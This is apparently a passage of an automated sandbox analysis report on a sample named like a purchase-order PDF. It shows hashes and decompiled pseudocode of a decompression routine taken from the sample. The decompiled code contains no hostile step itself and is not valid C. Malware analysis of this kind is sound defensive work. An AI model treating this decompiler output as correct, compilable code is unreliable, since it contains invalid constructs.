                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                            • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                            • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                            • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 98%
                                            			E004070AB() {
                                            				unsigned short _t532;
                                            				signed int _t533;
                                            				void _t534;
                                            				void* _t535;
                                            				signed int _t536;
                                            				signed int _t565;
                                            				signed int _t568;
                                            				signed int _t589;
                                            				signed int* _t606;
                                            				void* _t613;
                                            
                                            				L0:
                                            				while(1) {
                                            					L0:
                                            					if( *(_t613 - 0x40) != 0) {
                                            						L89:
                                            						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                            						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                            						L69:
                                            						_t606 =  *(_t613 - 0x58);
                                            						 *(_t613 - 0x84) = 0x12;
                                            						L132:
                                            						 *(_t613 - 0x54) = _t606;
                                            						L133:
                                            						_t532 =  *_t606;
                                            						_t589 = _t532 & 0x0000ffff;
                                            						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                            						if( *(_t613 - 0xc) >= _t565) {
                                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                            							 *(_t613 - 0x40) = 1;
                                            							_t533 = _t532 - (_t532 >> 5);
                                            							 *_t606 = _t533;
                                            						} else {
                                            							 *(_t613 - 0x10) = _t565;
                                            							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                            							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                            						}
                                            						if( *(_t613 - 0x10) >= 0x1000000) {
                                            							L139:
                                            							_t534 =  *(_t613 - 0x84);
                                            							L140:
                                            							 *(_t613 - 0x88) = _t534;
                                            							goto L1;
                                            						} else {
                                            							L137:
                                            							if( *(_t613 - 0x6c) == 0) {
                                            								 *(_t613 - 0x88) = 5;
                                            								goto L170;
                                            							}
                                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                            							goto L139;
                                            						}
                                            					} else {
                                            						if( *(__ebp - 0x60) == 0) {
                                            							L171:
                                            							_t536 = _t535 | 0xffffffff;
                                            							L172:
                                            							return _t536;
                                            						}
                                            						__eax = 0;
                                            						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                            						0 | _t258 = _t258 + _t258 + 9;
                                            						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                            						L75:
                                            						if( *(__ebp - 0x64) == 0) {
                                            							 *(__ebp - 0x88) = 0x1b;
                                            							L170:
                                            							_t568 = 0x22;
                                            							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                            							_t536 = 0;
                                            							goto L172;
                                            						}
                                            						__eax =  *(__ebp - 0x14);
                                            						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            						if(__eax >=  *(__ebp - 0x74)) {
                                            							__eax = __eax +  *(__ebp - 0x74);
                                            						}
                                            						__edx =  *(__ebp - 8);
                                            						__cl =  *(__eax + __edx);
                                            						__eax =  *(__ebp - 0x14);
                                            						 *(__ebp - 0x5c) = __cl;
                                            						 *(__eax + __edx) = __cl;
                                            						__eax = __eax + 1;
                                            						__edx = 0;
                                            						_t274 = __eax %  *(__ebp - 0x74);
                                            						__eax = __eax /  *(__ebp - 0x74);
                                            						__edx = _t274;
                                            						__eax =  *(__ebp - 0x68);
                                            						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            						_t283 = __ebp - 0x64;
                                            						 *_t283 =  *(__ebp - 0x64) - 1;
                                            						 *( *(__ebp - 0x68)) = __cl;
                                            						L79:
                                            						 *(__ebp - 0x14) = __edx;
                                            						L80:
                                            						 *(__ebp - 0x88) = 2;
                                            					}
                                            					L1:
                                            					_t535 =  *(_t613 - 0x88);
                                            					if(_t535 > 0x1c) {
                                            						goto L171;
                                            					}
                                            					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
                                            						case 0:
                                            							if( *(_t613 - 0x6c) == 0) {
                                            								goto L170;
                                            							}
                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                            							_t535 =  *( *(_t613 - 0x70));
                                            							if(_t535 > 0xe1) {
                                            								goto L171;
                                            							}
                                            							_t539 = _t535 & 0x000000ff;
                                            							_push(0x2d);
                                            							asm("cdq");
                                            							_pop(_t570);
                                            							_push(9);
                                            							_pop(_t571);
                                            							_t609 = _t539 / _t570;
                                            							_t541 = _t539 % _t570 & 0x000000ff;
                                            							asm("cdq");
                                            							_t604 = _t541 % _t571 & 0x000000ff;
                                            							 *(_t613 - 0x3c) = _t604;
                                            							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                            							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                            							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                            							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                            								L10:
                                            								if(_t612 == 0) {
                                            									L12:
                                            									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                            									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                            									goto L15;
                                            								} else {
                                            									goto L11;
                                            								}
                                            								do {
                                            									L11:
                                            									_t612 = _t612 - 1;
                                            									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                            								} while (_t612 != 0);
                                            								goto L12;
                                            							}
                                            							if( *(_t613 - 4) != 0) {
                                            								GlobalFree( *(_t613 - 4));
                                            							}
                                            							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                            							 *(_t613 - 4) = _t535;
                                            							if(_t535 == 0) {
                                            								goto L171;
                                            							} else {
                                            								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                            								goto L10;
                                            							}
                                            						case 1:
                                            							L13:
                                            							__eflags =  *(_t613 - 0x6c);
                                            							if( *(_t613 - 0x6c) == 0) {
                                            								 *(_t613 - 0x88) = 1;
                                            								goto L170;
                                            							}
                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                            							_t45 = _t613 - 0x48;
                                            							 *_t45 =  *(_t613 - 0x48) + 1;
                                            							__eflags =  *_t45;
                                            							L15:
                                            							if( *(_t613 - 0x48) < 4) {
                                            								goto L13;
                                            							}
                                            							_t547 =  *(_t613 - 0x40);
                                            							if(_t547 ==  *(_t613 - 0x74)) {
                                            								L20:
                                            								 *(_t613 - 0x48) = 5;
                                            								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                            								goto L23;
                                            							}
                                            							 *(_t613 - 0x74) = _t547;
                                            							if( *(_t613 - 8) != 0) {
                                            								GlobalFree( *(_t613 - 8));
                                            							}
                                            							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                            							 *(_t613 - 8) = _t535;
                                            							if(_t535 == 0) {
                                            								goto L171;
                                            							} else {
                                            								goto L20;
                                            							}
                                            						case 2:
                                            							L24:
                                            							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                            							 *(_t613 - 0x84) = 6;
                                            							 *(_t613 - 0x4c) = _t554;
                                            							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                            							goto L132;
                                            						case 3:
                                            							L21:
                                            							__eflags =  *(_t613 - 0x6c);
                                            							if( *(_t613 - 0x6c) == 0) {
                                            								 *(_t613 - 0x88) = 3;
                                            								goto L170;
                                            							}
                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            							_t67 = _t613 - 0x70;
                                            							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                            							__eflags =  *_t67;
                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                            							L23:
                                            							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                            							if( *(_t613 - 0x48) != 0) {
                                            								goto L21;
                                            							}
                                            							goto L24;
                                            						case 4:
                                            							goto L133;
                                            						case 5:
                                            							goto L137;
                                            						case 6:
                                            							__edx = 0;
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								__eax =  *(__ebp - 4);
                                            								__ecx =  *(__ebp - 0x38);
                                            								 *(__ebp - 0x34) = 1;
                                            								 *(__ebp - 0x84) = 7;
                                            								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                            								goto L132;
                                            							}
                                            							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                            							__esi =  *(__ebp - 0x60);
                                            							__cl = 8;
                                            							__cl = 8 -  *(__ebp - 0x3c);
                                            							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                            							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                            							__ecx =  *(__ebp - 0x3c);
                                            							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                            							__ecx =  *(__ebp - 4);
                                            							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                            							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                            							__eflags =  *(__ebp - 0x38) - 4;
                                            							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            							if( *(__ebp - 0x38) >= 4) {
                                            								__eflags =  *(__ebp - 0x38) - 0xa;
                                            								if( *(__ebp - 0x38) >= 0xa) {
                                            									_t98 = __ebp - 0x38;
                                            									 *_t98 =  *(__ebp - 0x38) - 6;
                                            									__eflags =  *_t98;
                                            								} else {
                                            									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                            								}
                                            							} else {
                                            								 *(__ebp - 0x38) = 0;
                                            							}
                                            							__eflags =  *(__ebp - 0x34) - __edx;
                                            							if( *(__ebp - 0x34) == __edx) {
                                            								__ebx = 0;
                                            								__ebx = 1;
                                            								goto L61;
                                            							} else {
                                            								__eax =  *(__ebp - 0x14);
                                            								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            								__eflags = __eax -  *(__ebp - 0x74);
                                            								if(__eax >=  *(__ebp - 0x74)) {
                                            									__eax = __eax +  *(__ebp - 0x74);
                                            									__eflags = __eax;
                                            								}
                                            								__ecx =  *(__ebp - 8);
                                            								__ebx = 0;
                                            								__ebx = 1;
                                            								__al =  *((intOrPtr*)(__eax + __ecx));
                                            								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                            								goto L41;
                                            							}
                                            						case 7:
                                            							__eflags =  *(__ebp - 0x40) - 1;
                                            							if( *(__ebp - 0x40) != 1) {
                                            								__eax =  *(__ebp - 0x24);
                                            								 *(__ebp - 0x80) = 0x16;
                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            								__eax =  *(__ebp - 0x28);
                                            								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            								__eax =  *(__ebp - 0x2c);
                                            								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            								__eax = 0;
                                            								__eflags =  *(__ebp - 0x38) - 7;
                                            								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            								__al = __al & 0x000000fd;
                                            								__eax = (__eflags >= 0) - 1 + 0xa;
                                            								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                            								__eax =  *(__ebp - 4);
                                            								__eax =  *(__ebp - 4) + 0x664;
                                            								__eflags = __eax;
                                            								 *(__ebp - 0x58) = __eax;
                                            								goto L69;
                                            							}
                                            							__eax =  *(__ebp - 4);
                                            							__ecx =  *(__ebp - 0x38);
                                            							 *(__ebp - 0x84) = 8;
                                            							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                            							goto L132;
                                            						case 8:
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								__eax =  *(__ebp - 4);
                                            								__ecx =  *(__ebp - 0x38);
                                            								 *(__ebp - 0x84) = 0xa;
                                            								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                            							} else {
                                            								__eax =  *(__ebp - 0x38);
                                            								__ecx =  *(__ebp - 4);
                                            								__eax =  *(__ebp - 0x38) + 0xf;
                                            								 *(__ebp - 0x84) = 9;
                                            								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                            								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                            							}
                                            							goto L132;
                                            						case 9:
                                            							goto L0;
                                            						case 0xa:
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								__eax =  *(__ebp - 4);
                                            								__ecx =  *(__ebp - 0x38);
                                            								 *(__ebp - 0x84) = 0xb;
                                            								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                            								goto L132;
                                            							}
                                            							__eax =  *(__ebp - 0x28);
                                            							goto L88;
                                            						case 0xb:
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								__ecx =  *(__ebp - 0x24);
                                            								__eax =  *(__ebp - 0x20);
                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            							} else {
                                            								__eax =  *(__ebp - 0x24);
                                            							}
                                            							__ecx =  *(__ebp - 0x28);
                                            							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            							L88:
                                            							__ecx =  *(__ebp - 0x2c);
                                            							 *(__ebp - 0x2c) = __eax;
                                            							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            							goto L89;
                                            						case 0xc:
                                            							L99:
                                            							__eflags =  *(__ebp - 0x6c);
                                            							if( *(__ebp - 0x6c) == 0) {
                                            								 *(__ebp - 0x88) = 0xc;
                                            								goto L170;
                                            							}
                                            							__ecx =  *(__ebp - 0x70);
                                            							__eax =  *(__ebp - 0xc);
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							_t334 = __ebp - 0x70;
                                            							 *_t334 =  *(__ebp - 0x70) + 1;
                                            							__eflags =  *_t334;
                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							__eax =  *(__ebp - 0x2c);
                                            							goto L101;
                                            						case 0xd:
                                            							L37:
                                            							__eflags =  *(__ebp - 0x6c);
                                            							if( *(__ebp - 0x6c) == 0) {
                                            								 *(__ebp - 0x88) = 0xd;
                                            								goto L170;
                                            							}
                                            							__ecx =  *(__ebp - 0x70);
                                            							__eax =  *(__ebp - 0xc);
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							_t122 = __ebp - 0x70;
                                            							 *_t122 =  *(__ebp - 0x70) + 1;
                                            							__eflags =  *_t122;
                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							L39:
                                            							__eax =  *(__ebp - 0x40);
                                            							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                            								goto L48;
                                            							}
                                            							__eflags = __ebx - 0x100;
                                            							if(__ebx >= 0x100) {
                                            								goto L54;
                                            							}
                                            							L41:
                                            							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                            							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                            							__ecx =  *(__ebp - 0x58);
                                            							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                            							 *(__ebp - 0x48) = __eax;
                                            							__eax = __eax + 1;
                                            							__eax = __eax << 8;
                                            							__eax = __eax + __ebx;
                                            							__esi =  *(__ebp - 0x58) + __eax * 2;
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            							__ax =  *__esi;
                                            							 *(__ebp - 0x54) = __esi;
                                            							__edx = __ax & 0x0000ffff;
                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                            							if( *(__ebp - 0xc) >= __ecx) {
                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            								__cx = __ax;
                                            								 *(__ebp - 0x40) = 1;
                                            								__cx = __ax >> 5;
                                            								__eflags = __eax;
                                            								__ebx = __ebx + __ebx + 1;
                                            								 *__esi = __ax;
                                            							} else {
                                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                            								 *(__ebp - 0x10) = __ecx;
                                            								0x800 = 0x800 - __edx;
                                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                            								__ebx = __ebx + __ebx;
                                            								 *__esi = __cx;
                                            							}
                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            							 *(__ebp - 0x44) = __ebx;
                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                            								goto L39;
                                            							} else {
                                            								goto L37;
                                            							}
                                            						case 0xe:
                                            							L46:
                                            							__eflags =  *(__ebp - 0x6c);
                                            							if( *(__ebp - 0x6c) == 0) {
                                            								 *(__ebp - 0x88) = 0xe;
                                            								goto L170;
                                            							}
                                            							__ecx =  *(__ebp - 0x70);
                                            							__eax =  *(__ebp - 0xc);
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							_t156 = __ebp - 0x70;
                                            							 *_t156 =  *(__ebp - 0x70) + 1;
                                            							__eflags =  *_t156;
                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							while(1) {
                                            								L48:
                                            								__eflags = __ebx - 0x100;
                                            								if(__ebx >= 0x100) {
                                            									break;
                                            								}
                                            								__eax =  *(__ebp - 0x58);
                                            								__edx = __ebx + __ebx;
                                            								__ecx =  *(__ebp - 0x10);
                                            								__esi = __edx + __eax;
                                            								__ecx =  *(__ebp - 0x10) >> 0xb;
                                            								__ax =  *__esi;
                                            								 *(__ebp - 0x54) = __esi;
                                            								__edi = __ax & 0x0000ffff;
                                            								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            								__eflags =  *(__ebp - 0xc) - __ecx;
                                            								if( *(__ebp - 0xc) >= __ecx) {
                                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            									__cx = __ax;
                                            									_t170 = __edx + 1; // 0x1
                                            									__ebx = _t170;
                                            									__cx = __ax >> 5;
                                            									__eflags = __eax;
                                            									 *__esi = __ax;
                                            								} else {
                                            									 *(__ebp - 0x10) = __ecx;
                                            									0x800 = 0x800 - __edi;
                                            									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            									__ebx = __ebx + __ebx;
                                            									 *__esi = __cx;
                                            								}
                                            								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            								 *(__ebp - 0x44) = __ebx;
                                            								if( *(__ebp - 0x10) >= 0x1000000) {
                                            									continue;
                                            								} else {
                                            									goto L46;
                                            								}
                                            							}
                                            							L54:
                                            							_t173 = __ebp - 0x34;
                                            							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                            							__eflags =  *_t173;
                                            							goto L55;
                                            						case 0xf:
                                            							L58:
                                            							__eflags =  *(__ebp - 0x6c);
                                            							if( *(__ebp - 0x6c) == 0) {
                                            								 *(__ebp - 0x88) = 0xf;
                                            								goto L170;
                                            							}
                                            							__ecx =  *(__ebp - 0x70);
                                            							__eax =  *(__ebp - 0xc);
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							_t203 = __ebp - 0x70;
                                            							 *_t203 =  *(__ebp - 0x70) + 1;
                                            							__eflags =  *_t203;
                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							L60:
                                            							__eflags = __ebx - 0x100;
                                            							if(__ebx >= 0x100) {
                                            								L55:
                                            								__al =  *(__ebp - 0x44);
                                            								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                            								goto L56;
                                            							}
                                            							L61:
                                            							__eax =  *(__ebp - 0x58);
                                            							__edx = __ebx + __ebx;
                                            							__ecx =  *(__ebp - 0x10);
                                            							__esi = __edx + __eax;
                                            							__ecx =  *(__ebp - 0x10) >> 0xb;
                                            							__ax =  *__esi;
                                            							 *(__ebp - 0x54) = __esi;
                                            							__edi = __ax & 0x0000ffff;
                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                            							if( *(__ebp - 0xc) >= __ecx) {
                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            								__cx = __ax;
                                            								_t217 = __edx + 1; // 0x1
                                            								__ebx = _t217;
                                            								__cx = __ax >> 5;
                                            								__eflags = __eax;
                                            								 *__esi = __ax;
                                            							} else {
                                            								 *(__ebp - 0x10) = __ecx;
                                            								0x800 = 0x800 - __edi;
                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            								__ebx = __ebx + __ebx;
                                            								 *__esi = __cx;
                                            							}
                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            							 *(__ebp - 0x44) = __ebx;
                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                            								goto L60;
                                            							} else {
                                            								goto L58;
                                            							}
                                            						case 0x10:
                                            							L109:
                                            							__eflags =  *(__ebp - 0x6c);
                                            							if( *(__ebp - 0x6c) == 0) {
                                            								 *(__ebp - 0x88) = 0x10;
                                            								goto L170;
                                            							}
                                            							__ecx =  *(__ebp - 0x70);
                                            							__eax =  *(__ebp - 0xc);
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							_t365 = __ebp - 0x70;
                                            							 *_t365 =  *(__ebp - 0x70) + 1;
                                            							__eflags =  *_t365;
                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							goto L111;
                                            						case 0x11:
                                            							goto L69;
                                            						case 0x12:
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								__eax =  *(__ebp - 0x58);
                                            								 *(__ebp - 0x84) = 0x13;
                                            								__esi =  *(__ebp - 0x58) + 2;
                                            								goto L132;
                                            							}
                                            							__eax =  *(__ebp - 0x4c);
                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                            							__ecx =  *(__ebp - 0x58);
                                            							__eax =  *(__ebp - 0x4c) << 4;
                                            							__eflags = __eax;
                                            							__eax =  *(__ebp - 0x58) + __eax + 4;
                                            							goto L130;
                                            						case 0x13:
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								_t469 = __ebp - 0x58;
                                            								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                            								__eflags =  *_t469;
                                            								 *(__ebp - 0x30) = 0x10;
                                            								 *(__ebp - 0x40) = 8;
                                            								L144:
                                            								 *(__ebp - 0x7c) = 0x14;
                                            								goto L145;
                                            							}
                                            							__eax =  *(__ebp - 0x4c);
                                            							__ecx =  *(__ebp - 0x58);
                                            							__eax =  *(__ebp - 0x4c) << 4;
                                            							 *(__ebp - 0x30) = 8;
                                            							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                            							L130:
                                            							 *(__ebp - 0x58) = __eax;
                                            							 *(__ebp - 0x40) = 3;
                                            							goto L144;
                                            						case 0x14:
                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                            							__eax =  *(__ebp - 0x80);
                                            							goto L140;
                                            						case 0x15:
                                            							__eax = 0;
                                            							__eflags =  *(__ebp - 0x38) - 7;
                                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            							__al = __al & 0x000000fd;
                                            							__eax = (__eflags >= 0) - 1 + 0xb;
                                            							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                            							goto L120;
                                            						case 0x16:
                                            							__eax =  *(__ebp - 0x30);
                                            							__eflags = __eax - 4;
                                            							if(__eax >= 4) {
                                            								_push(3);
                                            								_pop(__eax);
                                            							}
                                            							__ecx =  *(__ebp - 4);
                                            							 *(__ebp - 0x40) = 6;
                                            							__eax = __eax << 7;
                                            							 *(__ebp - 0x7c) = 0x19;
                                            							 *(__ebp - 0x58) = __eax;
                                            							goto L145;
                                            						case 0x17:
                                            							L145:
                                            							__eax =  *(__ebp - 0x40);
                                            							 *(__ebp - 0x50) = 1;
                                            							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                            							goto L149;
                                            						case 0x18:
                                            							L146:
                                            							__eflags =  *(__ebp - 0x6c);
                                            							if( *(__ebp - 0x6c) == 0) {
                                            								 *(__ebp - 0x88) = 0x18;
                                            								goto L170;
                                            							}
                                            							__ecx =  *(__ebp - 0x70);
                                            							__eax =  *(__ebp - 0xc);
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							_t484 = __ebp - 0x70;
                                            							 *_t484 =  *(__ebp - 0x70) + 1;
                                            							__eflags =  *_t484;
